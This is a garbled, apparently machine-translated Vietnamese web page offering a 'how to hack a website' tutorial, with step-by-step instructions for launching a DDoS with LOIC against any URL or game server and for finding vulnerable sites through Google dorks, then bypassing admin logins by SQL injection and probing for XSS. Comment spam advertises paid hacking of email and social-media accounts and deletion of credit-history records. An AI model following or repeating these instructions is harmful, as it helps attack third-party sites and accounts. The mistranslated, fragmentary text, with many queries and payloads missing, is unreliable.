khai thác lỗ hổng của các trang và thông báo lỗi và các lỗi hệ thống khác

Tấn công Dos hoặc DDOS: từ chối dịch vụ phân tán

Một cuộc tấn công DOS hoặc DDOS là một trong những cuộc tấn công của hacker mạnh nhất khi họ tắt bất kỳ hệ thống nào bằng cách gửi hàng đợi yêu cầu máy chủ với số lượng yêu cầu giả mạo. Một cuộc tấn công DDOS sử dụng nhiều hệ thống tấn công. Nhiều máy tính đồng thời khởi chạy các cuộc tấn công DOS trên cùng một máy chủ mục tiêu. Bởi vì một cuộc tấn công DOS kéo dài nhiều máy tính, nó được gọi là một cuộc tấn công từ chối dịch vụ phân tán.

Tin tặc sử dụng mạng zombie để khởi động các cuộc tấn công DDOS. Mạng zombie là tất cả những máy tính bị nhiễm mà tin tặc lặng lẽ cài đặt các công cụ tấn công DOS. Càng nhiều người tham gia vào mạng zombie, cuộc tấn công càng mạnh mẽ. Đó là, nếu nhân viên an ninh mạng chỉ đơn giản là bắt đầu chặn địa chỉ IP của người dùng, sẽ không có gì tốt từ nó.

Có nhiều công cụ có sẵn trên Internet có thể được tải xuống máy chủ miễn phí để thực hiện một cuộc tấn công và chỉ một vài trong số các công cụ này có thể hoạt động trên hệ thống zombie.

Cách hack một trang web – thông qua các lỗ hổng phần mềm

Sử dụng Google, bạn có thể dễ dàng xác định hồ sơ của tài nguyên web: các chương trình mà máy chủ đang chạy, loại hệ điều hành, v.v. Rất nhiều thông tin về điều này có thể được tìm thấy trên chúng tôi Nhưng khi Dorki trở nên phổ biến nhất, đó là khi tin tặc biết chính xác cách thức hoạt động của máy chủ và những lỗi đã biết trong phần mềm đã tồn tại.

Thông thường các bí mật của trang web có thể tiết lộ nội dung của thẻ. Mặc dù thực tế là bản ghi này không chứa nhãn chỉ rõ ràng, về nguyên tắc, toán tử nội dung: sẽ tạo ra văn bản dành riêng cho phần mềm với giblets. Vì vậy, nếu bạn là chủ sở hữu của trang web – cập nhật thường xuyên, các bản cập nhật được phát hành không phải là vô ích.

Cách hack một trang web – chúng tôi đang tìm kiếm các tệp và thư mục đang mở.

Chà, đây là một miếng ngon thực sự cho một hacker. Có quyền truy cập ở đây, việc hack trang web sẽ không khó. Thư mục không được bảo vệ – những gì có thể dễ dàng hơn? Và logic ở đây rất đơn giản.

Trong mỗi trường hợp, khi máy chủ web nhận được yêu cầu chứa tên của một thư mục (thường không phải là tên của một tệp cụ thể), máy chủ sẽ tìm kiếm một mặc định chỉ số tệp – được biết đến với tất cả các chủ sở hữu tài nguyên được gọi index.html hoặc một số tập hợp các tệp tiêu chuẩn, tùy thuộc vào cấu hình máy chủ. Nhưng nếu anh ta không tìm thấy nó (tôi không biết tại sao bạn quên đưa nó vào thư mục), máy chủ sẽ quay lại để đáp lại yêu cầu … cái gì? Phải rồi! Hiển thị hữu ích một danh sách tất cả các thư mục và tập tin, cũng sẽ tương tác.

Máy chủ sử dụng các điều kiện tiêu chuẩn, và do đó các lỗ như vậy dễ dàng được phát hiện. Ví dụ, đây là cách bạn có thể tìm nạp một loại tệp nhất định từ mạng, có thể chứa thông tin quan trọng về trang web (nó được lưu trữ trong các tệp văn bản quen thuộc như txt, docx, pdf), trong khi bỏ qua phần chính, hiển thị cho mọi người và do đó, hacker không quan tâm đến nội dung, chẳng hạn như các trang ở định dạng html, htmmã php v.v .:

Đối với một tìm kiếm chi tiết hơn, để hack trang web của một người dùng cụ thể, đủ để hacker bổ sung lệnh với một yêu cầu như

Chú ý đến thời điểm này, bạn sẽ ngạc nhiên khi có bao nhiêu trang web mở truy cập vào dữ liệu có giá trị như vậy, các tệp đôi khi có chứa dữ liệu đăng ký.

Thông thường, các truy vấn như vậy được sử dụng để tìm kiếm một cái gì đó miễn phí. Vì vậy, các truy vấn tìm kiếm thư mục ẩn ẩn phổ biến và đơn giản nhất thường bao gồm:

Yêu cầu tương tự được phát hành bởi công cụ máy chủ. Nó vẫn còn:

kiểm tra lỗ hổng mới trên https://www.cvedetails.com/ cho phiên bản Apache

nhặt và thiết lập một metasplit

Đừng hack, vì vậy ít nhất là ăn cắp …

Các vấn đề tương tự thường được giải quyết rất đơn giản. Chỉ cần đặt quy tắc để có tệp riêng của bạn trong mỗi thư mục và trong thư mục index.html. Hãy để nó trống, nếu chỉ có máy chủ sẽ trả lại nó. Tôi thường điền vào một tập tin như vậy với một liên kết đơn giản đến trang chính của trang web.

Làm thế nào để hack một trang web – script.

Một số tập tin thuộc tổng quan chung do nhầm lẫn. Một số tập lệnh được phép đăng nhập các sự kiện. Vì vậy, nếu bạn là chủ sở hữu hạnh phúc của phần mềm cho phép kiểm tra tải trên trang web trực tuyến, hãy đảm bảo rằng các trang chứa báo cáo được lưu trữ trong các thư mục được bảo vệ bằng mật khẩu.

Điều tương tự cũng xảy ra đối với các trang lỗi được máy chủ trả về trình duyệt hacker hacker. Nó chứa rất nhiều thông tin hữu ích cho ai đó đang cố gắng hack một trang web. Vì vậy, nếu, khi một số loại lỗi xảy ra, trang web cung cấp một đoạn mã (đôi khi đáng kể), Google cũng cẩn thận lập chỉ mục cho nó, tiết lộ bí mật cho các nhà quan sát bên ngoài. Các nhà phát triển web sử dụng một tính năng khét tiếng phpinfo để xem những gì là sai với mã hóa của trang web. Tính năng này có thể nói với các chuyên gia rất nhiều ở cả hai phía của chướng ngại vật. Chỉ để tham khảo, hãy xem các tính năng của tính năng gỡ lỗi. Kiểm tra trên Google:

Nhưng nhiều loại phần mềm hiển thị một kịch bản thông báo tiêu chuẩn (do đó dễ dàng tìm thấy) nếu chúng gặp bất kỳ lỗi nào trong quá trình hoạt động. Nhìn vào kết quả tìm kiếm:

Các thông báo lỗi như thế này có thể mang thông tin về cơ sở dữ liệu, kiểu, tên người dùng … nói chung, cơ sở cho việc tiêm SQL. Các hệ thống tập lệnh như PHP, ASP có thể tạo ra các lỗi mà từ đó bạn có thể tìm ra cấu trúc thư mục và thư mục của trang web, tên của các tệp tập lệnh và một cái gì đó hữu ích và đủ để bẻ khóa trang web. Đôi khi, một chức năng hữu ích trong Google cũng đóng vai trò của kẻ tấn công, giúp lưu trữ các trang của trang web và hiển thị các lỗ hổng được phát hiện và ẩn bởi quản trị viên hệ thống (nhưng đã được Google lập chỉ mục) an toàn.

Cách hack một trang web – kết luận

Cửa ra cho chúng tôi điều quan trọng nhất: nếu một số thông tin không thể hiểu được với bạn và không thể truy cập do lỗ hổng kiến ​​thức của bạn, thì đây là một mối đe dọa tiềm tàng cho trang web. Ngay cả khi các dork không chứa bất kỳ chi tiết cụ thể nào, chúng sẽ báo cho hacker biết phải bắt đầu từ đâu để hack trang web. Hãy thử truy vấn này:

và bạn sẽ thấy các mặt của tài nguyên web không thể truy cập được từ các trang web công cộng. Nếu bạn là quản trị viên tài nguyên của một tổ chức thành phố hoặc tiểu bang, đừng để việc phân tán tài liệu có thể dễ dàng tìm thấy bằng cách sử dụng truy vấn:

Cách hack một trang web – hãy xem các công cụ hack tự động

Làm việc với dork trong chế độ thủ công là định mệnh của một cuộc tấn công điểm vào một trang web cụ thể, trên đó một hacker đã mài răng trong một thời gian dài. Đối với người mới bắt đầu và những người đang thử sức mình, có những công cụ để tự động tìm kiếm các lỗ hổng bằng Google. Một trong số họ tồn tại tại chính Google. Anh, người vẫn chưa biết, được gọi là GoogleHacks:

Nếu bạn đã quyết định mọi thứ cho mình, hãy bắt đầu từ đó. Đây là những điều cơ bản.

Cách sử dụng công cụ LOIC Free để hack trang web bằng các cuộc tấn công DOS / DDOS:

LOIC (Low Orbit Ion Canon): Bạn cần tải xuống LOIC từ một nguồn mở miễn phí từ đây: http://sourceforge.net/projects/loic/. Khi bạn đã tải xuống, giải nén các tệp và lưu chúng vào máy tính để bàn của bạn.

Bây giờ, trong bước thứ hai, mở phần mềm và bạn sẽ nhận được một màn hình tương tự như sau:

Công cụ khởi động DDoS: LOIC miễn phí

Ở đây, trên màn hình, tìm văn bản với dòng chữ “Chọn mục tiêu và điền vào nó.” Bây giờ gõ hoặc sao chép / dán url trang web vào hộp. Nếu bạn muốn khởi động một cuộc tấn công vào địa chỉ IP, hãy đặt địa chỉ IP vào trường và nhấp vào nút khóa bên cạnh trường văn bản đã điền.

Trong giai đoạn thứ ba, chỉ cần bỏ qua nút có nội dung là im im Chargein mah lazer, và đi đến phần thứ ba, nghĩa là, đến các tham số tấn công. Giữ nguyên các tùy chọn khác, chẳng hạn như thời gian chờ, trang con, http và thanh tốc độ không thay đổi. Chỉ thay đổi tcp / udp và nhập dữ liệu ngẫu nhiên.

Trong loại cổng, chỉ cần chỉ định cổng mà bạn muốn khởi chạy cuộc tấn công và chọn UDP trong trường phương thức. Nếu bạn muốn tấn công trang web, hãy rời khỏi cổng, nhưng thay đổi nó cho các máy chủ minecraft. Thông thường, số cổng cho minecraft là 25565. Ngoài ra, hãy xóa hộp số chờ đợi câu trả lời của câu đố và để lại các luồng ở cấp 10. Nếu hệ thống máy tính của bạn có cấu hình tốt, bạn cũng có thể làm cho nó bằng 20, nhưng không vượt quá 20. Cuối cùng, màn hình của bạn sẽ trông như sau:

Cấu hình LOIC miễn phí

Cuối cùng, điều duy nhất cần thiết là nhấn nút IMMA CHARGIN MAH LAZER. Sau khi nhấp vào, bạn sẽ thấy cột được yêu cầu trong trạng thái tấn công, cần được điền với nhiều số và nhiều hơn nữa.

Sử dụng SQL Injection Attack để hack một trang web vào năm 2019:

Một phương pháp hack trang web thành công khác trong năm 2018 là tấn công SQL SQL. Trong phương pháp này, chúng ta có thể chèn các câu lệnh SQL độc hại vào bản ghi được gửi để thực thi. Để hoàn thành việc tiêm SQL, bạn cần tìm ra lỗ hổng trong phần mềm ứng dụng. Tin tặc có thể khai thác lỗ hổng trong các hệ thống này. Việc tiêm SQL để hack một trang web thường được gọi là vectơ trang web, nhưng nó có thể được sử dụng để tấn công bất kỳ cơ sở dữ liệu SQL nào.

Hầu hết các cuộc tấn công tiêm nhiễm SQL có thể được thực hiện trên cơ sở dữ liệu SQL tại nhiều trang web ASP.

Các bước để hack một trang web vào năm 2019 bằng cách sử dụng SQL tiêm:

Duyệt Google và chèn admin admin / chúng tôi vào công cụ tìm kiếm. Sử dụng tùy chọn để tìm kiếm ở nước ta,

Tìm một hình thức để vào trang web

Найдите какой-нибудь веб-сайт, на котором есть страница “Adminlogin.asp”, как показано на рисунке выше,

Теперь попробуйте ввести имя пользователя какadminи пароль как , как показано на рисунке ниже:

Форма для авторизации

Вот и все, теперь вы вошли в админку.

Если указанный выше пароль не работает, вы можете использовать приведенный ниже список паролей для атак SQL-инъекций. Однако стоит помнить, что данный пример взят с иностранного источника и пароли могут отличаться. Тут наверное все-таки банальный подбор. У нас в РФ, скорее всего самые популярные пароли другие. Я писал про это в одной из статей.

Список паролей для зарубежных ресурсов:

Что такое XSS?

Các cuộc tấn công XSS, còn được gọi là các cuộc tấn công kịch bản chéo trang, là một trong những lỗ hổng trong các ứng dụng web cung cấp cho tin tặc sử dụng kịch bản phía máy khách, thường là javascript, trên các trang web mà người dùng truy cập. Khi khách truy cập truy cập vào một liên kết độc hại, nó sẽ chạy javascript. Khi tin tặc khai thác lỗ hổng XSS, chúng có thể dễ dàng khởi chạy các cuộc tấn công lừa đảo, Trojan hoặc sâu hoặc thậm chí đánh cắp tài khoản.

Ví dụ: giả sử kẻ tấn công đã phát hiện ra lỗ hổng XSS trong Gmail và cũng đã tiêm một đoạn mã độc vào đó. Mỗi khi khách truy cập truy cập trang web, một tập lệnh độc hại sẽ được thực thi và mã chuyển hướng người dùng đến trang Gmail giả hoặc thậm chí có thể chụp cookie. Sau khi tin tặc đánh cắp cookie, anh ta có thể đăng nhập vào tài khoản Gmail của người khác hoặc thậm chí thay đổi mật khẩu.

Cách thực hiện các cuộc tấn công XSS trên một trang web vào năm 2019:

Bước 1: Tìm kiếm một trang web dễ bị tổn thương. Để khởi động một cuộc tấn công XSS, tin tặc có thể sử dụng Google dork để tìm một trang web dễ bị tấn công, ví dụ: sử dụng dork? Tìm kiếm = “hoặc” .php? Q = “. Moron này sẽ hiển thị một số trang web cụ thể trong kết quả tìm kiếm của Google mà bạn có thể sử dụng để hack.

Google dork là một nhân viên vô tình tiết lộ thông tin bí mật của công ty trên Internet. Từ “moron” là tiếng lóng cho một người ngu ngốc hoặc không có năng lực.

Google dork đặt thông tin của công ty vào rủi ro vì nó vô tình tạo ra các cánh cửa màu đen cho phép kẻ tấn công xâm nhập vào mạng mà không được phép và / hoặc có quyền truy cập vào thông tin trái phép. Để tìm thông tin nhạy cảm, kẻ tấn công sử dụng các chuỗi tìm kiếm nâng cao được gọi là truy vấn Google dork.

Các truy vấn Google dork được tạo bằng các toán tử tìm kiếm nâng cao mà các quản trị viên CNTT, nhà nghiên cứu và những người khác sử dụng trong công việc hàng ngày của họ để thu hẹp kết quả tìm kiếm. Các toán tử tìm kiếm thường được sử dụng bao gồm:

trang web: giới hạn kết quả truy vấn đối với một trang web hoặc tên miền cụ thể. Loại tệp: Giới hạn kết quả truy vấn đối với tệp PDF hoặc các loại tệp cụ thể khác.

intext: giới hạn kết quả cho các mục nội dung có chứa các từ hoặc cụm từ cụ thể.

Bước 2: Kiểm tra lỗ hổng:

Tìm kiếm trên trang web

Bây giờ hãy kiểm tra lỗ hổng bằng cách đặt một số dòng trong trường, ví dụ, chèn chèn BTS BTS vào trường đầu vào. Kết quả sẽ được hiển thị như sau:

Kết quả trong menu thả xuống

Bây giờ bấm chuột phải vào trang và xem mã nguồn của trang. Tìm dòng bạn đã nhập, đây là nhóm BTS BTS. Cũng đánh dấu nơi đặt dữ liệu đầu vào.

Bây giờ chúng ta cần tìm hiểu xem máy chủ có vệ sinh đầu vào của chúng ta hay không? Dán thẻ để xác minh điều này.

Dịch vụ của tin tặc chuyên nghiệp của Nga.

– Một lượng lớn khách hàng thường xuyên, – Mọi thứ hoàn toàn bí mật, – Lợi thế lớn và đảm bảo 100%, – Phá vỡ bất kỳ trang nào trong các mạng xã hội. Vkontakte, Odnoklassniki, Facebook, Twitter, và nhiều hơn nữa. – Chỉ cần phá vỡ .ICQ – Instagram – Viber – Điện báo – whatsapp – Skype – Trang web hẹn hò – MAIL HACK. – @ chúng tôi * @ chúng tôi * @ chúng tôi * @ chúng tôi * @ chúng tôi * @ chúng tôi * @ chúng tôi v.v.

– Chúng tôi tìm ra tên người dùng và mật khẩu ban đầu. VICTIM KHÔNG BIẾT VỀ HACK – Bạn luôn có thể ĐẶT HÀNG DỊCH VỤ HACK NÀY, đủ để biết URL hoặc id trang,

Ngoài ra còn có khả năng xóa thông tin của bạn trong cơ sở dữ liệu về lịch sử tín dụng (BKI), với giá cả phải chăng, trong khoảng thời gian từ 3 đến 7 ngày và bạn sẽ mãi mãi biến mất khỏi danh sách đen của BKI, v.v.

Chúng tôi làm việc 24 giờ trong gõ cửa. Địa chỉ liên lạc [email protected]

Tôi có thể giúp với điều này nếu ai cần viết thư: [email protected]

– Hack và chọn mật khẩu trên các dịch vụ email và mạng xã hội.

Chúng tôi làm việc với tất cả các dịch vụ email miễn phí, cũng như với tất cả các dịch vụ xã hội. mạng, trang web hẹn hò, blog, ICQ, twitter, và cũng IN SMS, WHATSAPP, VIBER GỌI CHI TIẾT (MỚI).

Chuyên nghiệp Bí mật. Thanh toán sau khi hoàn thành đơn hàng. Điều khoản hoạt động. Giá cá nhân từ 500 chà. [email protected]

chúng tôi sẽ giúp

DỊCH VỤ HACKER, MẠNG XÃ HỘI, HACKING VIBER WACAP, Hacking VKontakte và nhiều hơn nữa

Hack và chọn mật khẩu trên các dịch vụ email và mạng xã hội.

Chúng tôi làm việc với tất cả các dịch vụ email miễn phí, cũng như với tất cả các dịch vụ xã hội. mạng, trang web hẹn hò, blog, ICQ, twitter, và cũng IN SMS, WHATSAPP, VIBER GỌI CHI TIẾT (MỚI).

Bạn đang xem bài viết Hack Trang Web Bằng Cách Sử Dụng Havij Sql Injection / 2023 trên website Karefresh.com. Hy vọng những thông tin mà chúng tôi đã chia sẻ là hữu ích với bạn. Nếu nội dung hay, ý nghĩa bạn hãy chia sẻ với bạn bè của mình và luôn theo dõi, ủng hộ chúng tôi để cập nhật những thông tin mới nhất. Chúc bạn một ngày tốt lành!